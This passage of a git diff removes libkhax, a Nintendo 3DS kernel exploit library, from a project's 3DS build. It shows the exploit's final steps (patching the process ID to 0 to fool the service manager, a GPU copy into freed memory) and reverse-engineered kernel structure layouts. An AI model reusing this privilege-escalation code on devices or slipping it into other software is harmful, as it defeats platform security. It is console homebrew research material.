- KHAX_printf("Step7:GetPID2 fail:%08lx\n", result);
- return result;
- }
-
- if (newPID != 0)
- {
- KHAX_printf("Step7:nonzero:%lu\n", newPID);
- return MakeError(27, 11, KHAX_MODULE, 1023);
- }
-
- // Reinit ctrulib's srv connection to gain access to all services.
- srvExit();
- srvInit();
-
- // Restore the original PID now that srv has been tricked into thinking that we're PID 0.
- svcBackdoor(Step7b_UnpatchPID);
-
- // Check whether PID restoring succeeded.
- result = svcGetProcessId(&newPID, m_versionData->m_currentKProcessHandle);
- if (result != 0)
- {
- KHAX_printf("Step7:GetPID3 fail:%08lx\n", result);
- return result;
- }
-
- if (newPID != m_originalPID)
- {
- KHAX_printf("Step7:not same:%lu\n", newPID);
- return MakeError(27, 11, KHAX_MODULE, 1023);
- }
-
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Patch the PID to 0.
-Result KHAX::MemChunkHax::Step7a_PatchPID()
-{
- // Disable interrupts ASAP.
- // FIXME: Need a better solution for this.
- __asm__ volatile("cpsid aif");
-
- // Patch the PID to 0. The version data has a function pointer in m_makeKProcessPointers
- // to translate the raw KProcess pointer into pointers into key fields, and we access the
- // m_processID field from it.
- *(s_instance->m_versionData->m_makeKProcessPointers(*s_instance->m_versionData->m_currentKProcessPtr)
- .m_processID) = 0;
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Restore the original PID.
-Result KHAX::MemChunkHax::Step7b_UnpatchPID()
-{
- // Disable interrupts ASAP.
- // FIXME: Need a better solution for this.
- __asm__ volatile("cpsid aif");
-
- // Patch the PID back to the original value.
- *(s_instance->m_versionData->m_makeKProcessPointers(*s_instance->m_versionData->m_currentKProcessPtr)
- .m_processID) = s_instance->m_originalPID;
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Helper for dumping memory to SD card.
-template <std::size_t S>
-bool KHAX::MemChunkHax::DumpMemberToSDCard(const unsigned char(MemChunkHax::*member)[S], const char *filename) const
-{
- char formatted[32];
- snprintf(formatted, KHAX_lengthof(formatted), filename,
- static_cast<unsigned>(m_versionData->m_kernelVersion), m_versionData->m_new3DS ?
- "New" : "Old");
-
- bool result = true;
-
- FILE *file = std::fopen(formatted, "wb");
- if (file)
- {
- result = result && (std::fwrite(this->*member, 1, sizeof(this->*member), file) == 1);
- std::fclose(file);
- }
- else
- {
- result = false;
- }
-
- return result;
-}
-
-//------------------------------------------------------------------------------------------------
-// Free memory and such.
-KHAX::MemChunkHax::~MemChunkHax()
-{
- // Dump memory to SD card if that is enabled.
-#ifdef KHAX_DEBUG_DUMP_DATA
- if (m_nextStep > 6)
- {
- DumpMemberToSDCard(&MemChunkHax::m_savedKProcess, "KProcess-%08X-%s.bin");
- DumpMemberToSDCard(&MemChunkHax::m_savedKThread, "KThread-%08X-%s.bin");
- DumpMemberToSDCard(&MemChunkHax::m_savedThreadSVC, "ThreadSVC-%08X-%s.bin");
- }
-#endif
-
- // If we're corrupted, we're dead.
- if (m_corrupted > 0)
- {
- KHAX_printf("~:error while corrupt;freezing\n");
- for (;;)
- {
- svcSleepThread(s64(60) * 1000000000);
- }
- }
-
- // This function has to be careful not to crash trying to shut down after an aborted attempt.
- if (m_overwriteMemory)
- {
- u32 dummy;
-
- // Each page has a flag indicating that it is still allocated.
- for (unsigned x = 0; x < KHAX_lengthof(m_overwriteMemory->m_pages); ++x)
- {
- // Don't free a page unless it remains allocated.
- if (m_overwriteAllocated & (1u << x))
- {
- Result res = svcControlMemory(&dummy, reinterpret_cast<u32>(&m_overwriteMemory->m_pages[x]), 0,
- sizeof(m_overwriteMemory->m_pages[x]), MEMOP_FREE, static_cast<MemPerm>(0));
- KHAX_printf("free %u: %08lx\n", x, res);
- }
- }
- }
-
- // Free the extra linear memory.
- if (m_extraLinear)
- {
- linearFree(m_extraLinear);
- }
-
- // s_instance better be us
- if (s_instance != this)
- {
- KHAX_printf("~:s_instance is wrong\n");
- }
- else
- {
- s_instance = nullptr;
- }
-}
-
-
-//------------------------------------------------------------------------------------------------
-//
-// Miscellaneous
-//
-
-//------------------------------------------------------------------------------------------------
-// Make an error code
-inline Result KHAX::MakeError(Result level, Result summary, Result module, Result error)
-{
- return (level << 27) + (summary << 21) + (module << 10) + error;
-}
-
-//------------------------------------------------------------------------------------------------
-// Check whether this system is a New 3DS.
-Result KHAX::IsNew3DS(bool *answer, u32 kernelVersionAlreadyKnown)
-{
- // If the kernel version isn't already known by the caller, find out.
- u32 kernelVersion = kernelVersionAlreadyKnown;
- if (kernelVersion == 0)
- {
- kernelVersion = osGetKernelVersion();
- }
-
- // APT_CheckNew3DS doesn't work on < 8.0.0, but neither do such New 3DS's exist.
- if (kernelVersion >= SYSTEM_VERSION(2, 44, 6))
- {
- // Check whether the system is a New 3DS. If this fails, abort, because being wrong would
- // crash the system.
- u8 isNew3DS = 0;
- if (Result error = APT_CheckNew3DS(&isNew3DS))
- {
- *answer = false;
- return error;
- }
-
- // Use the result of APT_CheckNew3DS.
- *answer = isNew3DS != 0;
- return 0;
- }
-
- // Kernel is older than 8.0.0, so we logically conclude that this cannot be a New 3DS.
- *answer = false;
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// gspwn, meant for reading from or writing to freed buffers.
-Result KHAX::GSPwn(void *dest, const void *src, std::size_t size, bool wait)
-{
- // Attempt a flush of the source, but ignore the result, since we may have just been asked to
- // read unmapped memory or something similar.
- GSPGPU_FlushDataCache(static_cast<u8 *>(const_cast<void *>(src)), size);
-
- // Invalidate the destination's cache, since we're about to overwrite it. Likewise, ignore
- // errors, since it may be the destination that is an unmapped address.
- GSPGPU_InvalidateDataCache(static_cast<u8 *>(dest), size);
-
- // Copy that floppy.
- if (Result result = GX_TextureCopy(static_cast<u32 *>(const_cast<void *>(src)), 0,
- static_cast<u32 *>(dest), 0, size, 8))
- {
- KHAX_printf("gspwn:copy fail:%08lx\n", result);
- return result;
- }
-
- // Wait for the operation to finish.
- if (wait)
- {
- gspWaitForPPF();
- }
-
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Given a pointer to a structure that is a member of another structure,
-// return a pointer to the outer structure. Inspired by Windows macro.
-template <typename Outer, typename Inner>
-Outer *KHAX::ContainingRecord(Inner *member, Inner Outer::*field)
-{
- unsigned char *p = reinterpret_cast<unsigned char *>(member);
- p -= reinterpret_cast<std::uintptr_t>(&(static_cast<Outer *>(nullptr)->*field));
- return reinterpret_cast<Outer *>(p);
-}
-
-//------------------------------------------------------------------------------------------------
-// Main initialization function interface.
-extern "C" Result khaxInit()
-{
- using namespace KHAX;
-
-#ifdef KHAX_DEBUG
- bool isNew3DS;
- IsNew3DS(&isNew3DS, 0);
- KHAX_printf("khaxInit: k=%08lx f=%08lx n=%d\n", osGetKernelVersion(), osGetFirmVersion(),
- isNew3DS);
-#endif
-
- // Look up the current system's version in our table.
- const VersionData *versionData = VersionData::GetForCurrentSystem();
- if (!versionData)
- {
- KHAX_printf("khaxInit: Unknown kernel version\n");
- return MakeError(27, 6, KHAX_MODULE, 39);
- }
-
- KHAX_printf("verdat t=%08lx s=%08lx v=%08lx\n", versionData->m_threadPatchAddress,
- versionData->m_syscallPatchAddress, versionData->m_fcramVirtualAddress);
-
- // Create the hack object.
- MemChunkHax hax{ versionData };
-
- // Run through the steps.
- if (Result result = hax.Step1_Initialize())
- {
- KHAX_printf("khaxInit: Step1 failed: %08lx\n", result);
- return result;
- }
- if (Result result = hax.Step2_AllocateMemory())
- {
- KHAX_printf("khaxInit: Step2 failed: %08lx\n", result);
- return result;
- }
- if (Result result = hax.Step3_SurroundFree())
- {
- KHAX_printf("khaxInit: Step3 failed: %08lx\n", result);
- return result;
- }
- if (Result result = hax.Step4_VerifyExpectedLayout())
- {
- KHAX_printf("khaxInit: Step4 failed: %08lx\n", result);
- return result;
- }
- if (Result result = hax.Step5_CorruptCreateThread())
- {
- KHAX_printf("khaxInit: Step5 failed: %08lx\n", result);
- return result;
- }
- if (Result result = hax.Step6_ExecuteSVCCode())
- {
- KHAX_printf("khaxInit: Step6 failed: %08lx\n", result);
- return result;
- }
- if (Result result = hax.Step7_GrantServiceAccess())
- {
- KHAX_printf("khaxInit: Step7 failed: %08lx\n", result);
- return result;
- }
-
- KHAX_printf("khaxInit: done\n");
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Shut down libkhax. Doesn't actually do anything at the moment, since khaxInit does everything
-// and frees all memory on the way out.
-extern "C" Result khaxExit()
-{
- return 0;
-}
diff --git a/3ds/libkhax/khaxinternal.h b/3ds/libkhax/khaxinternal.h deleted file mode 100644 index 5d83eab..0000000 --- a/3ds/libkhax/khaxinternal.h +++ /dev/null @@ -1,339 +0,0 @@ -#pragma once
-
-#define KHAX_DEBUG
-//#define KHAX_DEBUG_DUMP_DATA
-
-#ifdef KHAX_DEBUG
- #define KHAX_printf(...) printf(__VA_ARGS__), gspWaitForVBlank(), gfxFlushBuffers(), gfxSwapBuffers()
-#else
- #define KHAX_printf static_cast<void>
-#endif
-
-// Shut up IntelliSense warnings when using MSVC as an IDE, even though MSVC will obviously never
-// actually compile this program.
-#ifdef _MSC_VER
- #undef ALIGN
- #define ALIGN(x) __declspec(align(x))
- #if _MSC_VER < 1900
- #define alignof __alignof
- #endif
- #define KHAX_ATTRIBUTE(...)
-#else
- #define KHAX_ATTRIBUTE(...) __VA_ARGS__
-#endif
-
-#define KHAX_lengthof(...) (sizeof(__VA_ARGS__) / sizeof((__VA_ARGS__)[0]))
-
-//------------------------------------------------------------------------------------------------
-namespace KHAX
-{
- //------------------------------------------------------------------------------------------------
- // This code uses offsetof illegally (i.e. on polymorphic classes).
- #pragma GCC diagnostic push
- #pragma GCC diagnostic ignored "-Winvalid-offsetof"
-
- //------------------------------------------------------------------------------------------------
- // General linked list node kernel object.
- struct KLinkedListNode
- {
- KLinkedListNode *next;
- KLinkedListNode *prev;
- void *data;
- };
- static_assert(sizeof(KLinkedListNode) == 0x00C, "KLinkedListNode isn't the expected size.");
-
- //------------------------------------------------------------------------------------------------
- // Base class of reference-counted kernel objects.
- class KAutoObject
- {
- public:
- u32 m_refCount; // +004
-
- protected:
- virtual ~KAutoObject() {}
- };
- static_assert(sizeof(KAutoObject) == 0x008, "KAutoObject isn't the expected size.");
- static_assert(offsetof(KAutoObject, m_refCount) == 0x004, "KAutoObject isn't the expected layout.");
-
- //------------------------------------------------------------------------------------------------
- // Base class of synchronizable objects.
- class KSynchronizationObject : public KAutoObject
- {
- public:
- u32 m_threadSyncCount; // +008
- KLinkedListNode *m_threadSyncFirst; // +00C
- KLinkedListNode *m_threadSyncLast; // +010
- };
- static_assert(sizeof(KSynchronizationObject) == 0x014, "KSynchronizationObject isn't the expected size.");
- static_assert(offsetof(KSynchronizationObject, m_threadSyncCount) == 0x008,
- "KSynchronizationObject isn't the expected layout.");
-
- //------------------------------------------------------------------------------------------------
- struct KDebugThread;
- struct KThreadLocalPage;
- class KCodeSet;
-
- //------------------------------------------------------------------------------------------------
- // Unofficial name
- typedef u8 KSVCACL[0x80 / 8];
-
- //------------------------------------------------------------------------------------------------
- // ARM VFP register
- union KHAX_ATTRIBUTE(__attribute__((__aligned__(4))) __attribute__((__packed__))) VFPRegister
- {
- float m_single[2];
- double m_double;
- };
- static_assert(alignof(VFPRegister) == 0x004,
- "VFPRegister isn't the expected alignment.");
- static_assert(sizeof(VFPRegister) == 0x008,
- "VFPRegister isn't the expected size.");
-
- //------------------------------------------------------------------------------------------------
- // SVC-mode register save area.
- // http://3dbrew.org/wiki/Memory_layout#0xFF4XX000
- struct SVCRegisterState
- {
- u32 m_r4; // +000
- u32 m_r5; // +004
- u32 m_r6; // +008
- u32 m_r7; // +00C
- u32 m_r8; // +010
- u32 m_r9; // +014
- u32 m_sl; // +018
- u32 m_fp; // +01C
- u32 m_sp; // +020
- u32 m_lr; // +024
- };
- static_assert(sizeof(SVCRegisterState) == 0x028,
- "SVCRegisterState isn't the expected size.");
-
- //------------------------------------------------------------------------------------------------
- // SVC-mode thread state structure. This is the last part of the per-
- // thread page allocated in 0xFF4XX000.
- // http://3dbrew.org/wiki/Memory_layout#0xFF4XX000
- struct SVCThreadArea
- {
- KSVCACL m_svcAccessControl; // +000
- u32 m_unknown010; // +010
- u32 m_unknown014; // +014
- SVCRegisterState m_svcRegisterState; // +018
- VFPRegister m_vfpRegisters[16]; // +040
- u32 m_unknown0C4; // +0C0
- u32 m_fpexc; // +0C4
- };
- static_assert(offsetof(SVCThreadArea, m_svcRegisterState) == 0x018,
- "ThreadSVCArea isn't the expected layout.");
- static_assert(sizeof(SVCThreadArea) == 0x0C8,
- "ThreadSVCArea isn't the expected size.");
-
- //------------------------------------------------------------------------------------------------
- // Kernel's internal structure of a thread object.
- class KThread : public KSynchronizationObject
- {
- public:
- u32 m_unknown014; // +014
- u32 m_unknown018; // +018
- u32 m_unknown01C; // +01C
- u32 m_unknown020; // +020
- u32 m_unknown024; // +024
- u32 m_unknown028; // +028
- u32 m_unknown02C; // +02C
- u32 m_unknown030; // +030
- u32 m_unknown034; // +034
- KDebugThread *m_debugThread; // +038
- s32 m_threadPriority; // +03C
- void *m_waitingOnObject; // +040
- u32 m_unknown044; // +044
- KThread **m_schedulerUnknown048; // +048
- void *m_arbitrationAddress; // +04C
- u32 m_unknown050; // +050
- u32 m_unknown054; // +054
- u32 m_unknown058; // +058
- KLinkedListNode *m_waitingOnList; // +05C
- u32 m_unknownListCount; // +060
- KLinkedListNode *m_unknownListHead; // +064
- KLinkedListNode *m_unknownListTail; // +068
- s32 m_threadPriority2; // +06C
- s32 m_creatingProcessor; // +070
- u32 m_unknown074; // +074
- u32 m_unknown078; // +078
- u16 m_unknown07C; // +07C
- u8 m_threadType; // +07E
- u8 m_padding07F; // +07F
- void *m_process; // +080
- u32 m_threadID; // +084
- SVCRegisterState *m_svcRegisterState; // +088
- void *m_svcPageEnd; // +08C
- s32 m_idealProcessor; // +090
- void *m_tlsUserMode; // +094
- void *m_tlsKernelMode; // +098
- u32 m_unknown09C; // +09C
- KThread *m_prev; // +0A0
- KThread *m_next; // +0A4
- KThread **m_temporaryLinkedList; // +0A8
- u32 m_unknown0AC; // +0B0
- };
- static_assert(sizeof(KThread) == 0x0B0,
- "KThread isn't the expected size.");
- static_assert(offsetof(KThread, m_svcRegisterState) == 0x088,
- "KThread isn't the expected layout.");
-
- //------------------------------------------------------------------------------------------------
- // Kernel's internal structure of a process object.
- // Version 1.0.0(?) - 7.2.0
- class KProcess_1_0_0_Old : public KSynchronizationObject
- {
- public:
- u32 m_unknown014; // +014
- u32 m_unknown018; // +018
- KThread *volatile m_interactingThread; // +01C
- u16 m_unknown020; // +020
- u16 m_unknown022; // +022
- u32 m_unknown024; // +024
- u32 m_unknown028; // +028
- u32 m_memoryBlockCount; // +02C
- KLinkedListNode *m_memoryBlockFirst; // +030
- KLinkedListNode *m_memoryBlockLast; // +034
- u32 m_unknown038; // +038
- u32 m_unknown03C; // +03C
- void *m_translationTableBase; // +040
- u8 m_contextID; // +044
- u32 m_unknown048; // +048
- u32 m_unknown04C; // +04C
- u32 m_mmuTableSize; // +050
- void *m_mmuTableAddress; // +054
- u32 m_threadContextPagesSize; // +058
- u32 m_threadLocalPageCount; // +05C
- KLinkedListNode *m_threadLocalPageFirst; // +060
- KLinkedListNode *m_threadLocalPageLast; // +064
- u32 m_unknown068; // +068
- s32 m_idealProcessor; // +06C
- u32 m_unknown070; // +070
- void *m_resourceLimits; // +074
- u8 m_unknown078; // +078
- u8 m_affinityMask; // +079
- u32 m_threadCount; // +07C
- KSVCACL m_svcAccessControl; // +080
- u32 m_interruptFlags[0x80 / 32]; // +090
- u32 m_kernelFlags; // +0A0
- u16 m_handleTableSize; // +0A4
- u16 m_kernelReleaseVersion; // +0A6
- KCodeSet *m_codeSet; // +0A8
- u32 m_processID; // +0AC
- u32 m_kernelFlags2; // +0B0
- u32 m_unknown0B4; // +0B4
- KThread *m_mainThread; // +0B8
- //...more...
- };
- static_assert(offsetof(KProcess_1_0_0_Old, m_svcAccessControl) == 0x080,
- "KProcess_1_0_0_Old isn't the expected layout.");
-
- //------------------------------------------------------------------------------------------------
- // Kernel's internal structure of a process object.
- // Old 3DS Version 8.0.0 - 9.5.0...
- class KProcess_8_0_0_Old : public KSynchronizationObject
- {
- public:
- u32 m_unknown014; // +014
- u32 m_unknown018; // +018
- KThread *volatile m_interactingThread; // +01C
- u16 m_unknown020; // +020
- u16 m_unknown022; // +022
- u32 m_unknown024; // +024
- u32 m_unknown028; // +028
- u32 m_memoryBlockCount; // +02C
- KLinkedListNode *m_memoryBlockFirst; // +030
- KLinkedListNode *m_memoryBlockLast; // +034
- u32 m_unknown038; // +038
- u32 m_unknown03C; // +03C
- void *m_translationTableBase; // +040
- u8 m_contextID; // +044
- u32 m_unknown048; // +048
- void *m_userVirtualMemoryEnd; // +04C
- void *m_userLinearVirtualBase; // +050
- u32 m_unknown054; // +054
- u32 m_mmuTableSize; // +058
- void *m_mmuTableAddress; // +05C
- u32 m_threadContextPagesSize; // +060
- u32 m_threadLocalPageCount; // +064
- KLinkedListNode *m_threadLocalPageFirst; // +068
- KLinkedListNode *m_threadLocalPageLast; // +06C
- u32 m_unknown070; // +070
- s32 m_idealProcessor; // +074
- u32 m_unknown078; // +078
- void *m_resourceLimits; // +07C
- u32 m_unknown080; // +080
- u32 m_threadCount; // +084
- u8 m_svcAccessControl[0x80 / 8]; // +088
- u32 m_interruptFlags[0x80 / 32]; // +098
- u32 m_kernelFlags; // +0A8
- u16 m_handleTableSize; // +0AC
- u16 m_kernelReleaseVersion; // +0AE
- KCodeSet *m_codeSet; // +0B0
- u32 m_processID; // +0B4
- u32 m_unknown0B8; // +0B8
- u32 m_unknown0BC; // +0BC
- KThread *m_mainThread; // +0C0
- //...more...
- };
- static_assert(offsetof(KProcess_8_0_0_Old, m_svcAccessControl) == 0x088,
- "KProcess_8_0_0_Old isn't the expected layout.");
-
- //------------------------------------------------------------------------------------------------
- // Kernel's internal structure of a process object.
- // New 3DS Version 8.0.0 - 9.5.0...
- class KProcess_8_0_0_New : public KSynchronizationObject
- {
- public:
- u32 m_unknown014; // +014
- u32 m_unknown018; // +018
- KThread *volatile m_interactingThread; // +01C
- u16 m_unknown020; // +020
- u16 m_unknown022; // +022
- u32 m_unknown024; // +024
- u32 m_unknown028; // +028
- u32 m_unknown02C; // +02C new to New 3DS
- u32 m_unknown030; // +030 new to New 3DS
- u32 m_memoryBlockCount; // +034
- KLinkedListNode *m_memoryBlockFirst; // +038
- KLinkedListNode *m_memoryBlockLast; // +03C
- u32 m_unknown040; // +040
- u32 m_unknown044; // +044
- void *m_translationTableBase; // +048
- u8 m_contextID; // +04C
- u32 m_unknown050; // +050
- void *m_userVirtualMemoryEnd; // +054
- void *m_userLinearVirtualBase; // +058
- u32 m_unknown05C; // +05C
- u32 m_mmuTableSize; // +060
- void *m_mmuTableAddress; // +064
- u32 m_threadContextPagesSize; // +068
- u32 m_threadLocalPageCount; // +06C
- KLinkedListNode *m_threadLocalPageFirst; // +070
- KLinkedListNode *m_threadLocalPageLast; // +074
- u32 m_unknown078; // +078
- s32 m_idealProcessor; // +07C
- u32 m_unknown080; // +080
- void *m_resourceLimits; // +084
- u32 m_unknown088; // +088
- u32 m_threadCount; // +08C
- u8 m_svcAccessControl[0x80 / 8]; // +090
- u32 m_interruptFlags[0x80 / 32]; // +0A0
- u32 m_kernelFlags; // +0B0
- u16 m_handleTableSize; // +0B4
- u16 m_kernelReleaseVersion; // +0B6
- KCodeSet *m_codeSet; // +0B8
- u32 m_processID; // +0BC
- u32 m_unknown0C0; // +0C0
- u32 m_unknown0C4; // +0C4
- KThread *m_mainThread; // +0C8
- //...more...
- };
- static_assert(offsetof(KProcess_8_0_0_New, m_svcAccessControl) == 0x090,
- "KProcess_8_0_0_New isn't the expected layout.");
-
- //------------------------------------------------------------------------------------------------
- // Done using illegal offsetof
- #pragma GCC diagnostic pop
-}
@@ -339,7 +339,7 @@ endif ifeq ($(platform), ctr) ifeq ($(HAVE_DYNAREC), 1) -OBJECTS += 3ds/3ds_utils.o 3ds/libkhax/khaxinit.o +OBJECTS += 3ds/3ds_utils.o ifeq ($(strip $(CTRULIB)),) $(error "Please set CTRULIB in your environment. export CTRULIB=<path to>ctrulib") |